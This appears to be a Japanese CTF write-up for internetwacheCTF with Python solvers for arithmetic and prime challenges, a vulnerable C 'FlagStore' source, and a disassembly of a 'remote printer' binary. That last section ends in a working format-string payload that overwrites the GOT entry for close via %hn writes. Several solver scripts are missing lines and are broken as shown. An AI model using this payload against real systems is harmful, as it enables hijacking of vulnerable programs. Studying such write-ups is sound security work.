internetwacheCTF writeup






50 A numbers game

Description: People either love or hate math. Do you love it? Prove it! You just need to solve a bunch of equations without a mistake. Service:

x + 7 = 10

みたいな計算式を送られるので、それを解くだけでした。 たまに改行があったりなかったりしたのでrecvで問題文受け取ってるか確認する文が必要でした。 以下頭が本当に悪いソルバ

from socket import *

recv = p.recv(4096)
print recv
while True:
    if recv.find("x") == -1:
        recv = p.recv(2048)
        print recv
    point = recv.find("x")
    code = recv[point:-1]
    a = code.split(" ")
    print a
    if a[1] == "+":
        d = int(a[4]) - int(a[2])
        print d
    elif a[1] == "-":
        d = int(a[2]) + int(a[4])
        print d
    elif a[1] == "*":
        d = int(a[4]) / int(a[2])
        print d
    recv = p.recv(2048)
    print recv
    print "-------------"

60 It's Prime Time!

Description: I created a program for an unsolveable equation system. My friend somehow forced it to solve the equations. Can you tell me how he did it? Service:





from socket import *

def is_prime(q):
    q = abs(q)
    if q == 2: return True
    if q < 2 or q&1 == 0: return False
    return pow(2, q-1, q) == 1


while True:
    recv = p.recv(2048)
    print recv
    if recv.find("Level")==-1:
        recv = p.recv(2048)
    point = recv.find("after")
    num = recv[point+6:-2]
    print num

    num1 = int(num)
    while True:
        num1 +=1
        if is_prime(num1):

70 A numbers game II

問題文メモってなかったです。みたいなコードが送られてきていて、暗号化してるよって問題文で言ってました。 暗号化の手順が添付ファイルにpythonで送られていたので、それをひとつずつ逆に戻すと計算式が出てきました。 その計算式をcode50と同じ方法で解いて、送ればフラグだと思ったんですが、受け取ってくれなくて、その答えをもう一回暗号化して送るとフラグでした。 以下ソルバ。添付ファイルをそのまま逆にして行ったのですごく汚い。

from socket import *
p.connect(("", 11071))
recv = p.recv(2048)

if recv.find("Level") == -1:
    recv = p.recv(2048)
print recv
s = recv[recv.find(":")+2:-1]
v = s.split('.')

print v
pr = []
for i in range(0,len(v)):
    c = bin(ord(v[i])-51).lstrip("0b")
    if (ord(v[i])-51 == 0):
    elif (ord(v[i])-51 < 2):
b = ''.join(pr)
print b
eq = []
for i in range(0,len(b),8):
    q = 32^int(b[i:i+8],2)
    print q
    qq = chr(q)
out = ''.join(eq)
print out
x = out.split(" ")
if x[1] == "+":
    d = int(x[4]) - int(x[2])
    print d
elif x[1] == "-":
    d = int(x[4]) + int(x[2])
    print d
elif x[1] == "*":
    d = int(x[4]) / int(x[2])
    print d

print p.recv(2048)


70 FlagStore

Description: Here's the ultimate flag store. Store and retrieve your flags whenever you want. Attachment: Service:


#include <stdio.h>
#include <string.h>
#include "flag.h"

void register_user(char *username, char *password);
int check_login(char *user, char *pass, char *username, char *password);

int main() {
    char username[500];
    int is_admin = 0;
    char password[500];
    int logged_in = 0;
    char flag[250];

    char user[500];
    char pw[500];
    setbuf(stdout, NULL);
    printf("Welcome to the FlagStore!\n");

    while (1) {
        printf("Choose an action:\n");
        printf("> %s: 1\n> %s: 2\n> %s: 3\n> %s: 4\n", "regiser", "login", "get_flag", "store_flag");
        int answer = 0;
        scanf("%d", &answer);

        switch(answer) {
            case 1:
                printf("Enter an username:");
                scanf("%s", username);
                printf("Enter a password:");
                scanf("%s", password);

                if(strcmp(username, "admin") == 0) {
                    printf("Sorry, admin user already registered\n");

                if(strlen(password) < 6) {
                    printf("Sorry, password too short\n");

                register_user(username, password);
                printf("User %s successfully registered. You can login now!\n", username);

            case 2:
                scanf("%499s", user);
                scanf("%499s", pw);

                if(check_login(user, pw, username, password) == -1) {
                    printf("Wrong credentials!\n");

                logged_in = 1;
                printf("You're now authenticated!\n");

            case 3:
                if(logged_in == 0) {
                    printf("Please login first!\n");

                if(is_admin != 0) {
                    strcpy(flag, FLAG);

                printf("Your flag: %s\n", flag);

            case 4:
                if(logged_in == 0) {
                    printf("Please login first!\n");

                printf("Enter your flag:");

                printf("Flag saved!\n");

                printf("Wrong option\nGood bye\n");
                return -1;

void register_user(char *username, char *password) {
    //XXX: Implement database connection

int check_login(char *user, char *pass, char *username, char *password) {
    if (strcmp(user, username) != 0 || strcmp(pass, password) != 0) {
        return -1;
    return 0;





remote printerという他のサーバーにアクセスしてそのサーバーの文字列を出力するプログラムでした。


gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : disabled


セクション .plt の逆アセンブル:

080484c0 <setbuf@plt-0x10>:
 80484c0:   ff 35 3c 9c 04 08       push   DWORD PTR ds:0x8049c3c
 80484c6:   ff 25 40 9c 04 08       jmp    DWORD PTR ds:0x8049c40
 80484cc:   00 00                   add    BYTE PTR [eax],al

080484d0 <setbuf@plt>:
 80484d0:   ff 25 44 9c 04 08       jmp    DWORD PTR ds:0x8049c44
 80484d6:   68 00 00 00 00          push   0x0
 80484db:   e9 e0 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

080484e0 <printf@plt>:
 80484e0:   ff 25 48 9c 04 08       jmp    DWORD PTR ds:0x8049c48
 80484e6:   68 08 00 00 00          push   0x8
 80484eb:   e9 d0 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

080484f0 <fgets@plt>:
 80484f0:   ff 25 4c 9c 04 08       jmp    DWORD PTR ds:0x8049c4c
 80484f6:   68 10 00 00 00          push   0x10
 80484fb:   e9 c0 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048500 <fclose@plt>:
 8048500:   ff 25 50 9c 04 08       jmp    DWORD PTR ds:0x8049c50
 8048506:   68 18 00 00 00          push   0x18
 804850b:   e9 b0 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048510 <htons@plt>:
 8048510:   ff 25 54 9c 04 08       jmp    DWORD PTR ds:0x8049c54
 8048516:   68 20 00 00 00          push   0x20
 804851b:   e9 a0 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048520 <perror@plt>:
 8048520:   ff 25 58 9c 04 08       jmp    DWORD PTR ds:0x8049c58
 8048526:   68 28 00 00 00          push   0x28
 804852b:   e9 90 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048530 <puts@plt>:
 8048530:   ff 25 5c 9c 04 08       jmp    DWORD PTR ds:0x8049c5c
 8048536:   68 30 00 00 00          push   0x30
 804853b:   e9 80 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048540 <__gmon_start__@plt>:
 8048540:   ff 25 60 9c 04 08       jmp    DWORD PTR ds:0x8049c60
 8048546:   68 38 00 00 00          push   0x38
 804854b:   e9 70 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048550 <__libc_start_main@plt>:
 8048550:   ff 25 64 9c 04 08       jmp    DWORD PTR ds:0x8049c64
 8048556:   68 40 00 00 00          push   0x40
 804855b:   e9 60 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048560 <fopen@plt>:
 8048560:   ff 25 68 9c 04 08       jmp    DWORD PTR ds:0x8049c68
 8048566:   68 48 00 00 00          push   0x48
 804856b:   e9 50 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048570 <__isoc99_scanf@plt>:
 8048570:   ff 25 6c 9c 04 08       jmp    DWORD PTR ds:0x8049c6c
 8048576:   68 50 00 00 00          push   0x50
 804857b:   e9 40 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048580 <socket@plt>:
 8048580:   ff 25 70 9c 04 08       jmp    DWORD PTR ds:0x8049c70
 8048586:   68 58 00 00 00          push   0x58
 804858b:   e9 30 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

08048590 <inet_addr@plt>:
 8048590:   ff 25 74 9c 04 08       jmp    DWORD PTR ds:0x8049c74
 8048596:   68 60 00 00 00          push   0x60
 804859b:   e9 20 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

080485a0 <connect@plt>:
 80485a0:   ff 25 78 9c 04 08       jmp    DWORD PTR ds:0x8049c78
 80485a6:   68 68 00 00 00          push   0x68
 80485ab:   e9 10 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

080485b0 <recv@plt>:
 80485b0:   ff 25 7c 9c 04 08       jmp    DWORD PTR ds:0x8049c7c
 80485b6:   68 70 00 00 00          push   0x70
 80485bb:   e9 00 ff ff ff          jmp    80484c0 <setbuf@plt-0x10>

080485c0 <close@plt>:
 80485c0:   ff 25 80 9c 04 08       jmp    DWORD PTR ds:0x8049c80
 80485c6:   68 78 00 00 00          push   0x78
 80485cb:   e9 f0 fe ff ff          jmp    80484c0 <setbuf@plt-0x10>

セクション .text の逆アセンブル:

080485d0 <.text>:
 80485d0:   31 ed                   xor    ebp,ebp
 80485d2:   5e                      pop    esi
 80485d3:   89 e1                   mov    ecx,esp
 80485d5:   83 e4 f0                and    esp,0xfffffff0
 80485d8:   50                      push   eax
 80485d9:   54                      push   esp
 80485da:   52                      push   edx
 80485db:   68 20 89 04 08          push   0x8048920
 80485e0:   68 c0 88 04 08          push   0x80488c0
 80485e5:   51                      push   ecx
 80485e6:   56                      push   esi
 80485e7:   68 cb 86 04 08          push   0x80486cb
 80485ec:   e8 5f ff ff ff          call   8048550 <__libc_start_main@plt>
 80485f1:   f4                      hlt    
 80485f2:   66 90                   xchg   ax,ax
 80485f4:   66 90                   xchg   ax,ax
 80485f6:   66 90                   xchg   ax,ax
 80485f8:   66 90                   xchg   ax,ax
 80485fa:   66 90                   xchg   ax,ax
 80485fc:   66 90                   xchg   ax,ax
 80485fe:   66 90                   xchg   ax,ax
 8048600:   8b 1c 24                mov    ebx,DWORD PTR [esp]
 8048603:   c3                      ret    
 8048604:   66 90                   xchg   ax,ax
 8048606:   66 90                   xchg   ax,ax
 8048608:   66 90                   xchg   ax,ax
 804860a:   66 90                   xchg   ax,ax
 804860c:   66 90                   xchg   ax,ax
 804860e:   66 90                   xchg   ax,ax
 8048610:   b8 8f 9c 04 08          mov    eax,0x8049c8f
 8048615:   2d 8c 9c 04 08          sub    eax,0x8049c8c
 804861a:   83 f8 06                cmp    eax,0x6
 804861d:   76 1a                   jbe    8048639 <close@plt+0x79>
 804861f:   b8 00 00 00 00          mov    eax,0x0
 8048624:   85 c0                   test   eax,eax
 8048626:   74 11                   je     8048639 <close@plt+0x79>
 8048628:   55                      push   ebp
 8048629:   89 e5                   mov    ebp,esp
 804862b:   83 ec 14                sub    esp,0x14
 804862e:   68 8c 9c 04 08          push   0x8049c8c
 8048633:   ff d0                   call   eax
 8048635:   83 c4 10                add    esp,0x10
 8048638:   c9                      leave  
 8048639:   f3 c3                   repz ret 
 804863b:   90                      nop
 804863c:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]
 8048640:   b8 8c 9c 04 08          mov    eax,0x8049c8c
 8048645:   2d 8c 9c 04 08          sub    eax,0x8049c8c
 804864a:   c1 f8 02                sar    eax,0x2
 804864d:   89 c2                   mov    edx,eax
 804864f:   c1 ea 1f                shr    edx,0x1f
 8048652:   01 d0                   add    eax,edx
 8048654:   d1 f8                   sar    eax,1
 8048656:   74 1b                   je     8048673 <close@plt+0xb3>
 8048658:   ba 00 00 00 00          mov    edx,0x0
 804865d:   85 d2                   test   edx,edx
 804865f:   74 12                   je     8048673 <close@plt+0xb3>
 8048661:   55                      push   ebp
 8048662:   89 e5                   mov    ebp,esp
 8048664:   83 ec 10                sub    esp,0x10
 8048667:   50                      push   eax
 8048668:   68 8c 9c 04 08          push   0x8049c8c
 804866d:   ff d2                   call   edx
 804866f:   83 c4 10                add    esp,0x10
 8048672:   c9                      leave  
 8048673:   f3 c3                   repz ret 
 8048675:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]
 8048679:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]
 8048680:   80 3d 90 9c 04 08 00    cmp    BYTE PTR ds:0x8049c90,0x0
 8048687:   75 13                   jne    804869c <close@plt+0xdc>
 8048689:   55                      push   ebp
 804868a:   89 e5                   mov    ebp,esp
 804868c:   83 ec 08                sub    esp,0x8
 804868f:   e8 7c ff ff ff          call   8048610 <close@plt+0x50>
 8048694:   c6 05 90 9c 04 08 01    mov    BYTE PTR ds:0x8049c90,0x1
 804869b:   c9                      leave  
 804869c:   f3 c3                   repz ret 
 804869e:   66 90                   xchg   ax,ax
 80486a0:   b8 48 9b 04 08          mov    eax,0x8049b48
 80486a5:   8b 10                   mov    edx,DWORD PTR [eax]
 80486a7:   85 d2                   test   edx,edx
 80486a9:   75 05                   jne    80486b0 <close@plt+0xf0>
 80486ab:   eb 93                   jmp    8048640 <close@plt+0x80>
 80486ad:   8d 76 00                lea    esi,[esi+0x0]
 80486b0:   ba 00 00 00 00          mov    edx,0x0
 80486b5:   85 d2                   test   edx,edx
 80486b7:   74 f2                   je     80486ab <close@plt+0xeb>
 80486b9:   55                      push   ebp
 80486ba:   89 e5                   mov    ebp,esp
 80486bc:   83 ec 14                sub    esp,0x14
 80486bf:   50                      push   eax
 80486c0:   ff d2                   call   edx
 80486c2:   83 c4 10                add    esp,0x10
 80486c5:   c9                      leave  
 80486c6:   e9 75 ff ff ff          jmp    8048640 <close@plt+0x80>
 80486cb:   8d 4c 24 04             lea    ecx,[esp+0x4]
 80486cf:   83 e4 f0                and    esp,0xfffffff0
 80486d2:   ff 71 fc                push   DWORD PTR [ecx-0x4]
 80486d5:   55                      push   ebp
 80486d6:   89 e5                   mov    ebp,esp
 80486d8:   51                      push   ecx
 80486d9:   83 ec 24                sub    esp,0x24
 80486dc:   a1 8c 9c 04 08          mov    eax,ds:0x8049c8c
 80486e1:   83 ec 08                sub    esp,0x8
 80486e4:   6a 00                   push   0x0
 80486e6:   50                      push   eax
 80486e7:   e8 e4 fd ff ff          call   80484d0 <setbuf@plt>
 80486ec:   83 c4 10                add    esp,0x10
 80486ef:   c7 45 e4 00 00 00 00    mov    DWORD PTR [ebp-0x1c],0x0
 80486f6:   83 ec 0c                sub    esp,0xc
 80486f9:   68 40 89 04 08          push   0x8048940
 80486fe:   e8 2d fe ff ff          call   8048530 <puts@plt>
 8048703:   83 c4 10                add    esp,0x10
 8048706:   83 ec 0c                sub    esp,0xc
 8048709:   68 5a 89 04 08          push   0x804895a
 804870e:   e8 cd fd ff ff          call   80484e0 <printf@plt>
 8048713:   83 c4 10                add    esp,0x10
 8048716:   83 ec 08                sub    esp,0x8
 8048719:   8d 45 e8                lea    eax,[ebp-0x18]
 804871c:   50                      push   eax
 804871d:   68 6e 89 04 08          push   0x804896e
 8048722:   e8 49 fe ff ff          call   8048570 <__isoc99_scanf@plt>
 8048727:   83 c4 10                add    esp,0x10
 804872a:   83 ec 0c                sub    esp,0xc
 804872d:   68 73 89 04 08          push   0x8048973
 8048732:   e8 a9 fd ff ff          call   80484e0 <printf@plt>
 8048737:   83 c4 10                add    esp,0x10
 804873a:   83 ec 08                sub    esp,0x8
 804873d:   8d 45 e4                lea    eax,[ebp-0x1c]
 8048740:   50                      push   eax
 8048741:   68 7f 89 04 08          push   0x804897f
 8048746:   e8 25 fe ff ff          call   8048570 <__isoc99_scanf@plt>
 804874b:   83 c4 10                add    esp,0x10
 804874e:   8b 45 e4                mov    eax,DWORD PTR [ebp-0x1c]
 8048751:   83 ec 04                sub    esp,0x4
 8048754:   50                      push   eax
 8048755:   8d 45 e8                lea    eax,[ebp-0x18]
 8048758:   50                      push   eax
 8048759:   68 84 89 04 08          push   0x8048984
 804875e:   e8 7d fd ff ff          call   80484e0 <printf@plt>
 8048763:   83 c4 10                add    esp,0x10
 8048766:   8b 45 e4                mov    eax,DWORD PTR [ebp-0x1c]
 8048769:   83 ec 08                sub    esp,0x8
 804876c:   50                      push   eax
 804876d:   8d 45 e8                lea    eax,[ebp-0x18]
 8048770:   50                      push   eax
 8048771:   e8 10 00 00 00          call   8048786 <close@plt+0x1c6>
 8048776:   83 c4 10                add    esp,0x10
 8048779:   b8 00 00 00 00          mov    eax,0x0
 804877e:   8b 4d fc                mov    ecx,DWORD PTR [ebp-0x4]
 8048781:   c9                      leave  
 8048782:   8d 61 fc                lea    esp,[ecx-0x4]
 8048785:   c3                      ret    
 8048786:   55                      push   ebp
 8048787:   89 e5                   mov    ebp,esp
 8048789:   81 ec 28 20 00 00       sub    esp,0x2028
 804878f:   83 ec 04                sub    esp,0x4
 8048792:   6a 00                   push   0x0
 8048794:   6a 01                   push   0x1
 8048796:   6a 02                   push   0x2
 8048798:   e8 e3 fd ff ff          call   8048580 <socket@plt>
 804879d:   83 c4 10                add    esp,0x10
 80487a0:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax
 80487a3:   83 7d f4 ff             cmp    DWORD PTR [ebp-0xc],0xffffffff
 80487a7:   75 15                   jne    80487be <close@plt+0x1fe>
 80487a9:   83 ec 0c                sub    esp,0xc
 80487ac:   68 af 89 04 08          push   0x80489af
 80487b1:   e8 7a fd ff ff          call   8048530 <puts@plt>
 80487b6:   83 c4 10                add    esp,0x10
 80487b9:   e9 a7 00 00 00          jmp    8048865 <close@plt+0x2a5>
 80487be:   83 ec 0c                sub    esp,0xc
 80487c1:   ff 75 08                push   DWORD PTR [ebp+0x8]
 80487c4:   e8 c7 fd ff ff          call   8048590 <inet_addr@plt>
 80487c9:   83 c4 10                add    esp,0x10
 80487cc:   89 45 e8                mov    DWORD PTR [ebp-0x18],eax
 80487cf:   66 c7 45 e4 02 00       mov    WORD PTR [ebp-0x1c],0x2
 80487d5:   8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
 80487d8:   0f b7 c0                movzx  eax,ax
 80487db:   83 ec 0c                sub    esp,0xc
 80487de:   50                      push   eax
 80487df:   e8 2c fd ff ff          call   8048510 <htons@plt>
 80487e4:   83 c4 10                add    esp,0x10
 80487e7:   66 89 45 e6             mov    WORD PTR [ebp-0x1a],ax
 80487eb:   83 ec 04                sub    esp,0x4
 80487ee:   6a 10                   push   0x10
 80487f0:   8d 45 e4                lea    eax,[ebp-0x1c]
 80487f3:   50                      push   eax
 80487f4:   ff 75 f4                push   DWORD PTR [ebp-0xc]
 80487f7:   e8 a4 fd ff ff          call   80485a0 <connect@plt>
 80487fc:   83 c4 10                add    esp,0x10
 80487ff:   85 c0                   test   eax,eax
 8048801:   79 12                   jns    8048815 <close@plt+0x255>
 8048803:   83 ec 0c                sub    esp,0xc
 8048806:   68 bc 89 04 08          push   0x80489bc
 804880b:   e8 10 fd ff ff          call   8048520 <perror@plt>
 8048810:   83 c4 10                add    esp,0x10
 8048813:   eb 50                   jmp    8048865 <close@plt+0x2a5>
 8048815:   6a 00                   push   0x0
 8048817:   68 00 20 00 00          push   0x2000
 804881c:   8d 85 e4 df ff ff       lea    eax,[ebp-0x201c]
 8048822:   50                      push   eax
 8048823:   ff 75 f4                push   DWORD PTR [ebp-0xc]
 8048826:   e8 85 fd ff ff          call   80485b0 <recv@plt>
 804882b:   83 c4 10                add    esp,0x10
 804882e:   85 c0                   test   eax,eax
 8048830:   79 12                   jns    8048844 <close@plt+0x284>
 8048832:   83 ec 0c                sub    esp,0xc
 8048835:   68 d1 89 04 08          push   0x80489d1
 804883a:   e8 f1 fc ff ff          call   8048530 <puts@plt>
 804883f:   83 c4 10                add    esp,0x10
 8048842:   eb 21                   jmp    8048865 <close@plt+0x2a5>
 8048844:   83 ec 0c                sub    esp,0xc
 8048847:   8d 85 e4 df ff ff       lea    eax,[ebp-0x201c]
 804884d:   50                      push   eax
 804884e:   e8 8d fc ff ff          call   80484e0 <printf@plt>
 8048853:   83 c4 10                add    esp,0x10
 8048856:   83 ec 0c                sub    esp,0xc
 8048859:   ff 75 f4                push   DWORD PTR [ebp-0xc]
 804885c:   e8 5f fd ff ff          call   80485c0 <close@plt>
 8048861:   83 c4 10                add    esp,0x10
 8048864:   90                      nop
 8048865:   c9                      leave  
 8048866:   c3                      ret    
 8048867:   55                      push   ebp
 8048868:   89 e5                   mov    ebp,esp
 804886a:   83 ec 48                sub    esp,0x48
 804886d:   83 ec 08                sub    esp,0x8
 8048870:   68 dc 89 04 08          push   0x80489dc
 8048875:   68 de 89 04 08          push   0x80489de
 804887a:   e8 e1 fc ff ff          call   8048560 <fopen@plt>
 804887f:   83 c4 10                add    esp,0x10
 8048882:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax
 8048885:   83 ec 04                sub    esp,0x4
 8048888:   ff 75 f4                push   DWORD PTR [ebp-0xc]
 804888b:   6a 32                   push   0x32
 804888d:   8d 45 c2                lea    eax,[ebp-0x3e]
 8048890:   50                      push   eax
 8048891:   e8 5a fc ff ff          call   80484f0 <fgets@plt>
 8048896:   83 c4 10                add    esp,0x10
 8048899:   83 ec 0c                sub    esp,0xc
 804889c:   ff 75 f4                push   DWORD PTR [ebp-0xc]
 804889f:   e8 5c fc ff ff          call   8048500 <fclose@plt>
 80488a4:   83 c4 10                add    esp,0x10
 80488a7:   83 ec 08                sub    esp,0x8
 80488aa:   8d 45 c2                lea    eax,[ebp-0x3e]
 80488ad:   50                      push   eax
 80488ae:   68 e7 89 04 08          push   0x80489e7
 80488b3:   e8 28 fc ff ff          call   80484e0 <printf@plt>
 80488b8:   83 c4 10                add    esp,0x10
 80488bb:   90                      nop
 80488bc:   c9                      leave  
 80488bd:   c3                      ret    
 80488be:   66 90                   xchg   ax,ax
 80488c0:   55                      push   ebp
 80488c1:   57                      push   edi
 80488c2:   56                      push   esi
 80488c3:   53                      push   ebx
 80488c4:   e8 37 fd ff ff          call   8048600 <close@plt+0x40>
 80488c9:   81 c3 6f 13 00 00       add    ebx,0x136f
 80488cf:   83 ec 0c                sub    esp,0xc
 80488d2:   8b 6c 24 20             mov    ebp,DWORD PTR [esp+0x20]
 80488d6:   8d b3 0c ff ff ff       lea    esi,[ebx-0xf4]
 80488dc:   e8 b7 fb ff ff          call   8048498 <setbuf@plt-0x38>
 80488e1:   8d 83 08 ff ff ff       lea    eax,[ebx-0xf8]
 80488e7:   29 c6                   sub    esi,eax
 80488e9:   c1 fe 02                sar    esi,0x2
 80488ec:   85 f6                   test   esi,esi
 80488ee:   74 25                   je     8048915 <close@plt+0x355>
 80488f0:   31 ff                   xor    edi,edi
 80488f2:   8d b6 00 00 00 00       lea    esi,[esi+0x0]
 80488f8:   83 ec 04                sub    esp,0x4
 80488fb:   ff 74 24 2c             push   DWORD PTR [esp+0x2c]
 80488ff:   ff 74 24 2c             push   DWORD PTR [esp+0x2c]
 8048903:   55                      push   ebp
 8048904:   ff 94 bb 08 ff ff ff    call   DWORD PTR [ebx+edi*4-0xf8]
 804890b:   83 c7 01                add    edi,0x1
 804890e:   83 c4 10                add    esp,0x10
 8048911:   39 f7                   cmp    edi,esi
 8048913:   75 e3                   jne    80488f8 <close@plt+0x338>
 8048915:   83 c4 0c                add    esp,0xc
 8048918:   5b                      pop    ebx
 8048919:   5e                      pop    esi
 804891a:   5f                      pop    edi
 804891b:   5d                      pop    ebp
 804891c:   c3                      ret    
 804891d:   8d 76 00                lea    esi,[esi+0x0]
 8048920:   f3 c3                   repz ret 

自分のサーバーで nc -l 25252 < text という感じで待ち受け、プログラムをサーバーにつなげて文字列を入力しました。

printfでfsb脆弱性があったので、 aaaa %x 無限に送って入力文字までのオフセット調べて、closeのgotを書き換えてflagを呼ぶ関数に飛ばすワンライナーを書いてサーバーで待ち受けてフラグ。


python -c 'print "\x80\x9c\x04\x08\x82\x9c\x04\x08%34911x%7$hn%32669x%8$hn"' | nc -l 25252

